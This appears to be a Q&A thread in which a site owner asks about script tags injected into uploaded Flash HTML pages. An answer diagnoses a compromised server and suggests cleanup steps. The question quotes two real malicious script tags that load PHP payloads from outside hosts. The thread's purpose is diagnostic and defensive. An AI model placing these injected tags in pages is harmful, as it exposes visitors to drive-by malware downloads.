Weird script reference injection in my htmls

Question

One friend is uploading flash files to my server with all the html package that the Flash CS6 editor suggests in its export command.

Well, despite all the Flash discussion and so, the problem is that eventually a very weird script references appear into the head element:

<!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://techmounting.com.au/KsEsFOFC.php" type="text/javascript"></script><!--/339810-->

This script reference is not in the original html file.. this smells a virus, but I don't find any reference in the whole google.. I don't know if is a virus in my friend's computer or in my server or what.

Any idea?

Another examples (not in my server)

http://www.iu-jaen.es (no visit with browser)

http://www.alliedcarehomehealth.com (no visit with browser)

<script type="text/javascript">var gwloaded = false;</script>
<script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>

Answer 1

Your web server has been compromised. TL;DR your website will display a content blocking interstitial to visiting users, which will direct them towards a suspicious binary download. The cause of the security breach is unclear, but I would take the normal precautions: reset relevant passwords, look for suspicious code snippets on PHP/javascript files.

Google also has a nice overview for some steps you can take to clean up your site (update third party plugins, change PWs, etc.):

https://support.google.com/webmasters/answer/163634

See this security posting from WebSense for a summary of the behavior of this attack:

http://community.websense.com/blogs/securitylabs/archive/tags/Mass+Injection/default.aspx